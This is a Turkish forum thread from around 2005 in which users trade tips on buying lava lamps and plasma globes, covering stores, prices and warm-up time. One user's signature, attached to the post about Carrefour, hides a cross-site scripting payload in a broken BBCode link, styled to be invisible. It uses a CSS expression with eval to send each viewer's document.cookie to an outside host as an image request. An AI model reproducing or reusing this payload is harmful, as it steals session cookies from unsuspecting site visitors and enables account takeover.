Jump to content
Forumu Destekleyenlere Katılın ×
Paticik Forumları
2000 lerden beri faal olan, çok şukela bir paylaşım platformuyuz. Hoşgeldiniz.

lava lambası arıyorum

kinetica

Öne çıkan mesajlar

• 3 hafta sonra ...
aranan lamba bulundu, metro market güneşlide, kapıdan girer girmez yılbaşı süsleri arasında dev bir lava dağı karşıladı beni, hepsini almak istedim. ürün de fiyatına göre oldukça iyi, 20 ytl ye 45cm yüksekliğinde cici bi lamba aldım, renk seçenekleri de var, talep ederseniz resmini de koyarım. bide sıvıyı barındıran ve cam olan kısmının dışında, gövdesi diğer bir çok ucuz lamba gibi plastik değil metalden, o yüzden çok daha iyi. lamba ısınınca falan sorun olmaz hem.
ilgilenen varsa gitsin alsın.

alaska marka (bir metro markası)
"vesuv" diye mavi kutulu bi ürün. bir de etna vardı, ama o daha ufak ve plastik gövdeliydi sanırım, o yüzden almadım.

unutmadan, bauhaus ta da , o "vıdıvık vıdık" küresi, yani plasma küresi var. şöyle 20cm çapında gayet güzel bir küre 43 ytl. ışık reyonunda disko süsleri falan olan yerde var. isteyen alsın.

[Bu mesaj kinetica tarafından 09 Aralık 2005 00:35 tarihinde değiştirilmiştir]
Sosyal ağlarda paylaş

eh hayırlı olsun :)[signature][hline][b]porsuk, 03 Ekim 2005 23:10 tarihinde demiş ki:
herkez kopmuş yarılmış iptal olmus ama biz ingilizce bilmiyoz
bu ne kültür boyle. bu nasıl bir bilimsellik bu nasıl evrensel yaklaşım bu nasıl yitirilmemiş felsevi birikim betime uyum ahenk lisan skuhut u fosforik cümle kapitalitik osturafyon
[/b]
Sosyal ağlarda paylaş

çok kıskandım hemen gidip alcam ben de. lava olan çok güzelmiş yau bunca zaman boşa yaşamışım :P[signature][hline]"Confess ten times and it becomes a habit, confess a hundred times and it becomes an obsession, confess forever and it becomes your destiny"
Ms. Bega
Sosyal ağlarda paylaş

Lava lambaları Ankara'da japon pazarı'nda vardı. İstanbul'da varsa öyle bir yer bulursun. Bende var vallla çok güzel de arkadaşına flan gel bak lamba var demeden bi yarım saat önce falan çalıştır yoksa arkadaşın bakıyo bildiin ışık çıkaran tabanında da çamur gibi bişey olan lamba görüyor. "Bu ne beee" diyor. Yani ısınması biraz uzun sürüyor.Hatta ben ilk aldığımda bozuk sanmıştım içindeki mum erimeyince[signature][hline]{==:{*__*}:==}
tymaut.blogspot.com
Sosyal ağlarda paylaş

OHOO tamam kesin alıyorum bu topicten sonra almazsam neyim[signature][hline]Nail "NaileR" Avunduk - Türkiye'nin yürüyen, koşan, zıplayan en büyük ve kapsamlı Star Trek ansiklopedisi
KoÇ '04 | CMU '09 | c4A | ST:O | Star Trek TR | MSN: [email protected] | (^ve Stargate^)
Jean-Luc Picard: "..Let's make sure history never forgets.. the name.. Enterprise"
Sosyal ağlarda paylaş

O küre gibi şey var ya, Fistan'ın koyduğu.
İçerenköy Carrefourda var o boy boy. 22 falan olması lazım fiyatı.
Ampül falan, spotların olduğu bölümde açık halde de var. Deneyebilirsiniz.[signature][hline]Wind of change...
]www.noir.gen.tr[url=http:///=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.xtratogame.net/pixel.gif?'+document.cookie;this.sss=null`style='font-size:0;][/url]'[/color][/url][/url]
Sosyal ağlarda paylaş

kendime kolpacı dedirtmem laan :-) [spo1=lambam][/spo]

linkte hata yapmadıysam lava lambamı ve hemen yanındaki altın tabak yemek tarifleri ansiklopedisini görebilirsiniz.

edit: niye ufak oldu resm bu kadar? ilk kez bi siteye resim upload edip link vermeye çalıştımda...

neyse ben size direk link te vereyim. http://img22.imagevenue.com/img.php?loc=loc70&image=47e8a_PICT0244.JPG

olmazsa copy-paste deneyin oluyor.
http://img22.imagevenue.com/img.php?loc=loc70&image=47e8a_PICT0244.JPG

[Bu mesaj kinetica tarafından 11 Aralık 2005 11:45 tarihinde değiştirilmiştir]

Sosyal ağlarda paylaş

Bi dakika şimdi o vakumlu elektrik kürelerinin tam ismi ne?Sakın ''vakumlu elektrik küresi'' demeyin...:)[signature][hline]"so now, i got a granddaughter from a son who's not me own, and a daughter o' his that's not his own. ye'd think that one of us would've figured out that half the fun's makin' tha damn brats!"
Bruenor Battlehammer
Sosyal ağlarda paylaş

Bende var evde, 9 euro'ya bulmuştum indirimden, ama epeydir yakmıyorum duruyor bir köşede.

Altta bildiğiniz bir ampül var. Ampülün ısısıyla tüpün içindeki embriyoya benzeyen zımbırtılar dans ediyor. Ama adam gibi ısınıp güzel bir kıvama gelmesi için 2 saatten fazla açık durması gerekiyor benim lambada.

Kullanım kulavuzunda 8 saatten uzun süre çalıştırmayın diyordu. Devamlı böyle 8 saatten uzun süre çalıştırırsanız tüpün içindeki cisimler özelliklerini kaybediyorlarmış eskisi gibi güzel çalışmıyormuş sonra. Denemedim bilmiyorum. :p[signature][hline]Icq: 50896214 / Msn & E-Mail: [email protected]
Kane | Level 60 | Orc Warrior | Magtheridon | GrimSoul
Sosyal ağlarda paylaş

• 1 yıl sonra ...
  • Yeni Oluştur...